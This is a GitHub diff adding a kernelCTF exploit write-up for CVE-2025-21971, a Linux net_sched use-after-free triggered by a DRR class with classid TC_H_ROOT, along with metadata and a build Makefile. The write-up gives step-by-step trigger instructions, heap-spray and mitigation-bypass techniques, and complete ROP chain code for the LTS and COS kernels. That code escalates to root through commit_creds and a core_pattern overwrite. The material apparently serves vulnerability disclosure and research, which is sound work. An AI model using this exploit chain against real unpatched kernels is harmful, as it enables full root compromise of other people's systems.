Skip to content
373 changes: 373 additions & 0 deletions pocs/linux/kernelctf/CVE-2025-21971_lts_cos_mitigation/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,373 @@
# Overview

In the `qdisc_tree_reduce_backlog()`, if the parentid is `TC_H_ROOT`, the iteration is terminated [1]. However, in a classful qdisc such as a DRR qdisc, we can create a class with a classid `TC_H_ROOT (ffff:ffff)`, so the while statement can terminate even if the parent is not the actual root qdisc. As a result, `qdisc_tree_reduce_backlog()` fails to notify the parent qdisc properly.

```c
void qdisc_tree_reduce_backlog(struct Qdisc *sch, int n, int len)
{
bool qdisc_is_offloaded = sch->flags & TCQ_F_OFFLOADED;
const struct Qdisc_class_ops *cops;
unsigned long cl;
u32 parentid;
bool notify;
int drops;

if (n == 0 && len == 0)
return;
drops = max_t(int, n, 0);
rcu_read_lock();
while ((parentid = sch->parent)) {
if (parentid == TC_H_ROOT) // [1]
break;

if (sch->flags & TCQ_F_NOPARENT)
break;
/* Notify parent qdisc only if child qdisc becomes empty.
*
* If child was empty even before update then backlog
* counter is screwed and we skip notification because
* parent class is already passive.
*
* If the original child was offloaded then it is allowed
* to be seem as empty, so the parent is notified anyway.
*/
notify = !sch->q.qlen && !WARN_ON_ONCE(!n &&
!qdisc_is_offloaded);
/* TODO: perform the search on a per txq basis */
sch = qdisc_lookup_rcu(qdisc_dev(sch), TC_H_MAJ(parentid));
if (sch == NULL) {
WARN_ON_ONCE(parentid != TC_H_ROOT);
break;
}
cops = sch->ops->cl_ops;
if (notify && cops->qlen_notify) {
cl = cops->find(sch, parentid);
cops->qlen_notify(sch, cl);
}
sch->q.qlen -= n;
sch->qstats.backlog -= len;
__qdisc_qstats_drop(sch, drops);
}
rcu_read_unlock();
}
```

We can trigger the UAF as follows.

- Create a Qdisc DRR `ffff:`
- Create a Class DRR `ffff:ffff` which is a classid of `TC_H_ROOT`
- Create a Class DRR `ffff:0001`
- Create a Qdisc NetEM `2:` as a child of `ffff:0001`
- Send a packet to `ffff:0001`
- Send a packet to `ffff:ffff`
- Delete the Class DRR `ffff:ffff`
- Send a packet to trigger the UAF

# KASLR Bypass

We used a timing side channel attack to leak the kernel base.

# RIP Control

RIP is controlled in `drr_dequeue()`.

```c
static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
struct drr_sched *q = qdisc_priv(sch);
struct drr_class *cl;
struct sk_buff *skb;
unsigned int len;

if (list_empty(&q->active))
goto out;
while (1) {
cl = list_first_entry(&q->active, struct drr_class, alist);
skb = cl->qdisc->ops->peek(cl->qdisc); // [2]
if (skb == NULL) {
qdisc_warn_nonwc(__func__, cl->qdisc);
goto out;
}
```

When the DRR Qdisc class is deleted, both `cl` and `cl->qdisc` are freed. At this point, with both freed, `cl` is left in its freed state and a fake qdisc is sprayed onto `cl->qdisc`. This allows control over the RIP when `cl->qdisc->ops->peek` is called [2]. Setting the fake qdisc's ops to `drr_qdisc_ops` causes the `peek` function below to be invoked.

```c
static inline struct sk_buff *qdisc_peek_dequeued(struct Qdisc *sch)
{
struct sk_buff *skb = skb_peek(&sch->gso_skb);

/* we can reuse ->gso_skb because peek isn't called for root qdiscs */
if (!skb) {
skb = sch->dequeue(sch); // [3]

if (skb) {
__skb_queue_head(&sch->gso_skb, skb);
/* it's still part of the queue */
qdisc_qstats_backlog_inc(sch, skb);
sch->q.qlen++;
}
}

return skb;
}
```

In `qdisc_peek_dequeued()`, if `sch->gso_skb` is `0`, `sch->dequeue` is called [3]. Since `sch->dequeue` corresponds to the 0x8 offset in `struct Qdisc`, a stack pivot gadget can be stored at this location to perform ROP.

We allocate the `user_key_payload` and `ctl_buf` objects into `kmalloc-512` for the fake Qdisc spray.

For mitigation kernel, we use multiq Qdisc to bypass mitigations. We allocate the multiq Qdisc to `cl->qdisc`.

```c
static int multiq_init(struct Qdisc *sch, struct nlattr *opt,
struct netlink_ext_ack *extack)
{
struct multiq_sched_data *q = qdisc_priv(sch);
int i, err;

q->queues = NULL;

if (!opt)
return -EINVAL;

err = tcf_block_get(&q->block, &q->filter_list, sch, extack);
if (err)
return err;

q->max_bands = qdisc_dev(sch)->num_tx_queues;

q->queues = kcalloc(q->max_bands, sizeof(struct Qdisc *), GFP_KERNEL); // [4]
if (!q->queues)
return -ENOBUFS;
for (i = 0; i < q->max_bands; i++)
q->queues[i] = &noop_qdisc;

return multiq_tune(sch, opt, extack);
}
```

When initializing the multiq Qdisc, `q->queues` is allocated in `multiq_init()` [4]. At this point, the object size can be controlled to be `q->max_bands*sizeof(struct Qdisc *)`. Since `q->max_bands` is a user-controllable value, an object of any desired size can be allocated. To bypass mitigation, allocate an object larger than `0x2000`, which uses the page allocator. Then, delete the multiq Qdisc and allocate the `ctl_buf` objects into the freed `q->queues`.

```c
static struct sk_buff *multiq_peek(struct Qdisc *sch)
{
struct multiq_sched_data *q = qdisc_priv(sch);
unsigned int curband = q->curband;
struct Qdisc *qdisc;
struct sk_buff *skb;
int band;

for (band = 0; band < q->bands; band++) {
/* cycle through bands to ensure fairness */
curband++;
if (curband >= q->bands)
curband = 0;

/* Check that target subqueue is available before
* pulling an skb to avoid head-of-line blocking.
*/
if (!netif_xmit_stopped(
netdev_get_tx_queue(qdisc_dev(sch), curband))) {
qdisc = q->queues[curband];
skb = qdisc->ops->peek(qdisc); // [5]
if (skb)
return skb;
}
}
return NULL;

}
```

Next, when a packet is sent, `multiq_peek()` is called from `drr_dequeue()`. It then references `q->queues` and calls `qdisc->ops->peek()` [5]. Using `ctl_buf`, it overwrites `q->queues[]` with the address of the `cpu_entry_area`. As a result, `qdisc->ops` can also be set to an address within `cpu_entry_area`, and finally, the RIP can be controlled.

# Post-RIP

For LTS kernel, the ROP payload is stored in `struct Qdisc` allocated in `kmalloc-512`. When `sch->dequeue()` is called, `RDI` points to the beginning of the `struct Qdisc`.

```c
void rop_chain(uint64_t* data){
int i = 0;

data[i++] = kbase + POP_POP_POP_RET; // enqueue
data[i++] = kbase + PUSH_RDI_POP_RSP_RET; // dequeue

data[i++] = 0; // keylen
data[i++] = kbase + DRR_QDISC_OPS; // ops

// current = find_task_by_vpid(getpid())
data[i++] = kbase + POP_RDI_RET;
data[i++] = getpid();
data[i++] = kbase + FIND_TASK_BY_VPID;

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
data[i++] = kbase + POP_RSI_RET;
data[i++] = RCU_READ_LOCK_NESTING_OFF;
data[i++] = kbase + ADD_RAX_RSI_RET;

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
data[i++] = kbase + POP_RCX_RET;
data[i++] = 0;
data[i++] = kbase + MOV_RAX_RCX_RET;

// Bypass "schedule while atomic": set oops_in_progress = 1
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + POP_RSI_RET;
data[i++] = 0; // gsoskb.next

data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + OOPS_IN_PROGRESS;
data[i++] = kbase + MOV_RSI_RDI_RET;

// commit_creds(&init_cred)
data[i++] = kbase + POP_RDI_RET;
data[i++] = kbase + INIT_CRED;
data[i++] = kbase + COMMIT_CREDS;

// find_task_by_vpid(1)
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + FIND_TASK_BY_VPID;

// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
data[i++] = kbase + MOV_RDI_RAX_RET;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + INIT_NSPROXY;
data[i++] = kbase + SWITCH_TASK_NAMESPACES;

data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
data[i++] = 0;
data[i++] = 0;
data[i++] = _user_rip;
data[i++] = _user_cs;
data[i++] = _user_rflags;
data[i++] = _user_sp;
data[i++] = _user_ss;
}
```

For COS kernel, the ROP payload is stored in `struct Qdisc` allocated in `kmalloc-512`. When `sch->dequeue()` is called, `RBP` points to the `struct Qdisc+0x80`.

```c
void rop_chain(uint64_t* data){
int i = 0;

data[i++] = 0; // enqueue
data[i++] = kbase + MOV_RSP_RBP_POP_RBP_RET; // dequeue

data[i++] = 0; // keylen
data[i++] = kbase + DRR_QDISC_OPS; // ops

i += 12;

data[i++] = 0; // gsoskb.next

// current = find_task_by_vpid(getpid())
data[i++] = kbase + POP_RDI_RET;
data[i++] = getpid();
data[i++] = kbase + FIND_TASK_BY_VPID;

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
data[i++] = kbase + POP_RSI_RET;
data[i++] = RCU_READ_LOCK_NESTING_OFF;
data[i++] = kbase + ADD_RAX_RSI_RET;

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
data[i++] = kbase + POP_RCX_RET;
data[i++] = 0;
data[i++] = kbase + MOV_RAX_RCX_RET;

// Bypass "schedule while atomic": set oops_in_progress = 1
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + OOPS_IN_PROGRESS;
data[i++] = kbase + MOV_RSI_RDI_RET;

// commit_creds(&init_cred)
data[i++] = kbase + POP_RDI_RET;
data[i++] = kbase + INIT_CRED;
data[i++] = kbase + COMMIT_CREDS;

// find_task_by_vpid(1)
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + FIND_TASK_BY_VPID;

// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
data[i++] = kbase + MOV_RDI_RAX_RET;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + INIT_NSPROXY;
data[i++] = kbase + SWITCH_TASK_NAMESPACES;

data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
data[i++] = 0;
data[i++] = 0;
data[i++] = _user_rip;
data[i++] = _user_cs;
data[i++] = _user_rflags;
data[i++] = _user_sp;
data[i++] = _user_ss;
}
```

For the mitigation kernel, the payload is stored in the `cpu_entry_area` as follows.

```c
// Fill the CPU entry area exception stack of HELPER_CPU with a
// struct cpu_entry_area_payload
static void setup_cpu_entry_area() {
if (fork()) {
return;
}

struct cpu_entry_area_payload payload = {};

payload.regs[0] = kbase + QDISC_RESET; // multiq->ops->peek
payload.regs[1] = kbase + POP_POP_RET;
payload.regs[2] = kbase + PUSH_RBX_POP_RSP_RBP_RET; // multiq->ops->reset
payload.regs[3] = PAYLOAD_LOCATION(1) - PEEK_OFF ; // fake ops
payload.regs[4] = kbase + POP_RDI_POP_RSI_POP_RDX_POP_RET;
payload.regs[5] = kbase + CORE_PATTERN;
payload.regs[6] = MMAP_ADDR;
payload.regs[7] = strlen((char*)MMAP_ADDR);
payload.regs[8] = 0;
payload.regs[9] = kbase + COPY_FROM_USER;
payload.regs[10] = kbase + MSLEEP;

set_affinity(1);
signal(SIGFPE, sig_handler);
signal(SIGTRAP, sig_handler);
signal(SIGSEGV, sig_handler);
setsid();

while(1){
write_cpu_entry_area(&payload);
usleep(10000);
}
}
```

When RIP is controlled, `qdisc_reset()` is called first.

```c
void qdisc_reset(struct Qdisc *qdisc)
{
const struct Qdisc_ops *ops = qdisc->ops;

trace_qdisc_reset(qdisc);

if (ops->reset)
ops->reset(qdisc); // [6]

__skb_queue_purge(&qdisc->gso_skb);
__skb_queue_purge(&qdisc->skb_bad_txq);

qdisc->q.qlen = 0;
qdisc->qstats.backlog = 0;
}
```

In `qdisc_reset()`, `ops->reset()` is called with the address of the `cpu_entry_area` in the `RBX` register [6]. Therefore, ROP can be performed by modifying `ops->reset()` into a stack pivot gadget. The `core_pattern` overwrite technique is used to gain root shell access.
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
- Requirements:
- Capabilities: CAP_NET_ADMIN, CAP_NET_RAW
- Kernel configuration: CONFIG_NET_SCHED
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=066a3b5b2346 ([NET_SCHED] sch_api: fix qdisc_tree_decrease_qlen() loop)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0c3057a5a04d07120b3d0ec9c79568fceb9c921e (net_sched: Prevent creation of classes with TC_H_ROOT)
- Affected Version: v2.6.25 - v6.14-rc6
- Affected Component: net/sched
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged username space
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2025-21971
- Description: In the Linux kernel, the following vulnerability has been resolved: net_sched: Prevent creation of classes with TC_H_ROOT The function qdisc_tree_reduce_backlog() uses TC_H_ROOT as a termination condition when traversing up the qdisc tree to update parent backlog counters. However, if a class is created with classid TC_H_ROOT, the traversal terminates prematurely at this class instead of reaching the actual root qdisc, causing parent statistics to be incorrectly maintained. In case of DRR, this could lead to a crash as reported by Mingi Cho. Prevent the creation of any Qdisc class with classid TC_H_ROOT (0xFFFFFFFF) across all qdisc types, as suggested by Jamal.
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
exploit:
gcc -o exploit ./exploit.c -lkeyutils -static

prerequisites:
sudo apt-get install libkeyutils-dev
Binary file not shown.
Loading
Loading